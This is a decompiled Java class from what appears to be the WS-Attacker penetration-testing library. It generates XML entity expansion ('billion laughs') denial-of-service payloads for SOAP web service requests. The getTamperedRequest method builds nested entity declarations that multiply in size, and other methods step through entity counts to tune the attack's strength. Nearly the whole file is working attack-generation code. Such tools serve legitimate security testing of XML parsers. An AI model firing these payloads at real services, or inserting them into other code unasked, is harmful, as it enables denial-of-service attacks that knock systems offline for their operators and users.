/*
 * Decompiled with CFR 0.152.
 */
package wsattacker.library.intelligentdos.dos;

import java.util.ArrayList;
import java.util.List;
import java.util.logging.Level;
import java.util.logging.Logger;
import org.apache.commons.lang3.RandomStringUtils;
import wsattacker.library.intelligentdos.common.DoSParam;
import wsattacker.library.intelligentdos.dos.AbstractDoSAttack;
import wsattacker.library.intelligentdos.dos.DoSAttack;
import wsattacker.library.intelligentdos.dos.XmlElementCount;
import wsattacker.library.intelligentdos.helper.IterateModel;

public class XmlEntityExpansion
extends AbstractDoSAttack {
    private static final int MIN_NUMBER_OF_ENTITY_ELEMENTS = 2;
    private static final int MIN_NUMBER_OF_ENTITIES = 2;
    private static final String XML = "<?xml version=\"1.0\" encoding=\"UTF-8\"?>";
    private final DoSAttack.PayloadPosition[] possiblePossitions = new DoSAttack.PayloadPosition[]{DoSAttack.PayloadPosition.ELEMENT};
    private static final IterateModel defaultNumberOfEntities = IterateModel.custom().startAt(2).stopAt(200).setIncrement(4).setIterateStrategie(IterateModel.IterateStrategie.MUL).setIncreaseIncrementStrategie(IterateModel.IncreaseIncrementStrategie.NO).build();
    private static final IterateModel defaultNumberOfEntityElements = IterateModel.custom().startAt(2).stopAt(4).setIncrement(2).setIterateStrategie(IterateModel.IterateStrategie.MUL).setIncreaseIncrementStrategie(IterateModel.IncreaseIncrementStrategie.NO).build();
    private IterateModel numberOfEntities;
    private IterateModel numberOfEntityElements;
    private int currentNumberOfEntities;
    private int currentNumberOfEntityElements;
    private static final int currentStringLength = 2;

    public XmlEntityExpansion() {
        try {
            this.numberOfEntities = defaultNumberOfEntities.clone();
            this.numberOfEntityElements = defaultNumberOfEntityElements.clone();
        }
        catch (CloneNotSupportedException e) {
            this.LOG.warn((Object)e);
        }
    }

    @Override
    public String getName() {
        return "XmlEntityExpansion";
    }

    @Override
    public DoSAttack.PayloadPosition[] getPossiblePossitions() {
        DoSAttack.PayloadPosition[] copy = new DoSAttack.PayloadPosition[this.possiblePossitions.length];
        System.arraycopy(this.possiblePossitions, 0, copy, 0, this.possiblePossitions.length);
        return copy;
    }

    public IterateModel getNumberOfEntitiesIterator() {
        try {
            return this.numberOfEntities.clone();
        }
        catch (CloneNotSupportedException ex) {
            Logger.getLogger(XmlElementCount.class.getName()).log(Level.SEVERE, null, ex);
            return null;
        }
    }

    public void setNumberOfEntitiesIterator(IterateModel iterateModel) {
        if (iterateModel == null) {
            throw new IllegalArgumentException("NumberOfEntitiesIterator may not be null");
        }
        this.numberOfEntities = iterateModel;
    }

    public IterateModel getNumberOfEntityElementsIterator() {
        try {
            return this.numberOfEntityElements.clone();
        }
        catch (CloneNotSupportedException ex) {
            Logger.getLogger(XmlElementCount.class.getName()).log(Level.SEVERE, null, ex);
            return null;
        }
    }

    public void setNumberOfEntityElementsIterator(IterateModel iterateModel) {
        if (iterateModel == null) {
            throw new IllegalArgumentException("NumberOfEntityElementsIterator may not be null");
        }
        this.numberOfEntityElements = iterateModel;
    }

    @Override
    public boolean hasFurtherParams() {
        return this.numberOfEntities.hasNext() || this.numberOfEntityElements.hasNext();
    }

    @Override
    public void nextParam() {
        if (!this.initialized) {
            this.currentNumberOfEntityElements = this.numberOfEntityElements.next();
            this.currentNumberOfEntities = this.numberOfEntities.next();
            this.initialized = true;
        } else if (this.numberOfEntityElements.hasNext()) {
            this.currentNumberOfEntityElements = this.numberOfEntityElements.next();
        } else if (this.numberOfEntities.hasNext()) {
            this.numberOfEntityElements.reset();
            this.currentNumberOfEntityElements = this.numberOfEntityElements.next();
            this.currentNumberOfEntities = this.numberOfEntities.next();
        }
    }

    @Override
    public List<DoSParam<?>> getCurrentParams() {
        ArrayList list = new ArrayList();
        list.add(new DoSParam<Integer>("Number of Entities", this.currentNumberOfEntities));
        list.add(new DoSParam<Integer>("Number of Entity Elements", this.currentNumberOfEntityElements));
        return list;
    }

    @Override
    int getCommentLength(DoSAttack.PayloadPosition payloadPosition) {
        int length = XML.length();
        length += 22;
        length += 15;
        length += 2;
        for (int element = 1; element < this.currentNumberOfEntities; ++element) {
            length += 14;
            length += String.valueOf(element).length();
            length += 6;
            length += 2 * String.valueOf(element - 1).length();
            for (int aaa = 2; aaa < this.currentNumberOfEntityElements; ++aaa) {
                length += 3;
                length += String.valueOf(element - 1).length();
            }
        }
        length += 10;
        return length += String.valueOf(this.currentNumberOfEntities - 1).length();
    }

    @Override
    public String getTamperedRequest(String xml, DoSAttack.PayloadPosition payloadPosition) {
        this.verifyPayloadPosition(payloadPosition);
        String random = RandomStringUtils.randomAlphabetic((int)2);
        StringBuilder sb = new StringBuilder();
        sb.append(XML);
        sb.append("<!DOCTYPE Envelope [");
        sb.append("<!ENTITY x0 \"" + random + "\">");
        for (int entityElement = 1; entityElement < this.currentNumberOfEntities; ++entityElement) {
            sb.append("<!ENTITY x").append(entityElement).append(" \"");
            sb.append("&x").append(entityElement - 1).append(";");
            sb.append("&x").append(entityElement - 1).append(";");
            for (int entityCount = 2; entityCount < this.currentNumberOfEntityElements; ++entityCount) {
                sb.append("&x").append(entityElement - 1).append(";");
            }
            sb.append("\">");
        }
        sb.append("]");
        sb.append(">");
        StringBuilder sbElement = new StringBuilder();
        sbElement.append("<s>&x").append(this.currentNumberOfEntities - 1).append(";</s>");
        String replacePlaceholder = payloadPosition.replacePlaceholder(xml, sbElement.toString());
        sb.append(replacePlaceholder);
        return sb.toString();
    }

    @Override
    public DoSAttack minimal() {
        XmlEntityExpansion xmlEntityExpansion = new XmlEntityExpansion();
        xmlEntityExpansion.currentNumberOfEntities = 2;
        xmlEntityExpansion.currentNumberOfEntityElements = 2;
        return xmlEntityExpansion;
    }

    @Override
    public DoSAttack middle(DoSAttack aThat) {
        if (this == aThat) {
            XmlEntityExpansion xmlEntityExpansion = new XmlEntityExpansion();
            xmlEntityExpansion.currentNumberOfEntities = this.currentNumberOfEntities;
            xmlEntityExpansion.currentNumberOfEntityElements = this.currentNumberOfEntityElements;
            return xmlEntityExpansion;
        }
        if (!aThat.getClass().equals(this.getClass()) || !(aThat instanceof XmlEntityExpansion)) {
            throw new IllegalArgumentException(aThat.getClass() + " is not allowed!");
        }
        XmlEntityExpansion that = (XmlEntityExpansion)aThat;
        XmlEntityExpansion xmlEntityExpansion = new XmlEntityExpansion();
        if (this.currentNumberOfEntities == that.currentNumberOfEntities && this.currentNumberOfEntityElements < that.currentNumberOfEntityElements) {
            xmlEntityExpansion.currentNumberOfEntities = this.currentNumberOfEntities;
            xmlEntityExpansion.currentNumberOfEntityElements = this.currentNumberOfEntityElements;
        } else if (this.currentNumberOfEntities == that.currentNumberOfEntities) {
            xmlEntityExpansion.currentNumberOfEntities = this.currentNumberOfEntities;
            xmlEntityExpansion.currentNumberOfEntityElements = XmlEntityExpansion.calculateMiddle(this.currentNumberOfEntityElements, that.currentNumberOfEntityElements);
        } else if (this.currentNumberOfEntityElements < that.currentNumberOfEntityElements) {
            xmlEntityExpansion.currentNumberOfEntities = XmlEntityExpansion.calculateMiddle(this.currentNumberOfEntities, that.currentNumberOfEntities);
            xmlEntityExpansion.currentNumberOfEntityElements = this.currentNumberOfEntityElements;
        } else {
            xmlEntityExpansion.currentNumberOfEntities = XmlEntityExpansion.calculateMiddle(this.currentNumberOfEntities, that.currentNumberOfEntities);
            xmlEntityExpansion.currentNumberOfEntityElements = XmlEntityExpansion.calculateMiddle(this.currentNumberOfEntityElements, that.currentNumberOfEntityElements);
        }
        return xmlEntityExpansion;
    }

    @Override
    public void initialize() {
        super.initialize();
        this.numberOfEntities.reset();
        this.numberOfEntityElements.reset();
    }

    @Override
    public int compareTo(DoSAttack aThat) {
        if (this == aThat) {
            return 0;
        }
        if (!aThat.getClass().equals(this.getClass())) {
            return 0;
        }
        XmlEntityExpansion that = (XmlEntityExpansion)aThat;
        if (this.currentNumberOfEntities < that.currentNumberOfEntities) {
            return -1;
        }
        if (this.currentNumberOfEntities > that.currentNumberOfEntities) {
            return 1;
        }
        if (this.currentNumberOfEntityElements < that.currentNumberOfEntityElements) {
            return -1;
        }
        if (this.currentNumberOfEntityElements > that.currentNumberOfEntityElements) {
            return 1;
        }
        return 0;
    }
}

